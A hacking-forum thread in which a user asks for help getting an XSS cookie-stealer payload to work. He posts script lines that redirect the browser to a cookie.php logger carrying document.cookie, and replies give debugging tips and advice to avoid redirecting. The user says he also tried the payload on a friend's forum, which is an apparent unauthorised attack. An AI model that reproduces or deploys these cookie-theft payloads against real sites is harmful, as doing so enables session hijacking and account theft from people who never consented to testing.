Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Help with My XSS

  1. Home
  2. Forum
  3. Web hacking
  4. Help with My XSS

ghost's Avatar

ghost

0 0

Ive been recently playing around with a little web page i set up on my other computer and playing around with the effects of XSS

I have a basic search bar and made it vuln to XSS

what I put in the search bar redirects it to my cookie logger

the problem is its not logging the cookies…..Im using system meltdowns cookie stealer and I have changed the permisions so it can read and write by anyone….

<script>window.location=""http://localhost/xss/cookie.php?cookie="+document.cookie;</script>

thats the code im puting into my search bar it sends me to my page and my cookie grabber but it wont grab the cookie solutions ideas anyone?

and yes I have cookies enabled and it tells me the referer just not the cookie =(

and yes Ive read alot through google and milw0rm about xss


richohealey's Avatar

richohealey

Python Ninja
0 0

is that it exaclty? do you walways put two " at the start?


ghost's Avatar

ghost

0 0

lmao


ghost's Avatar

ghost

0 0

k i took that out and it still just logs the referrer but not the cookie


richohealey's Avatar

richohealey

Python Ninja
0 0

if the logger wis written right, it should just grab and store the cookie POST_ variable.

write a test script that jut echo's it.

form there you can change it in increments so you know what's fucked


ghost's Avatar

ghost

0 0

assuming I was using it in the right spot insidious it didnt work =(

I put the () escape function

here <script>window.location=('http://localhostowns/xss/cookie.php?var=')+document.cookie;</script>

I then went on to put them on the document.cookie and it still didnt do anything sighs


Uber0n's Avatar

Uber0n

Member
0 0

… And your cookies work correctly? :right:


ghost's Avatar

ghost

0 0

i dunno I think I just suck….. it wont grab the cookie from my friends forum either =(

I think the reason its not working is because its redirecting to my cookie grabber and that makes the grabber think its grabbing the cookie from my page set up and theres no cookies for that page

thoughts?


ghost's Avatar

ghost

0 0

Don't redirect!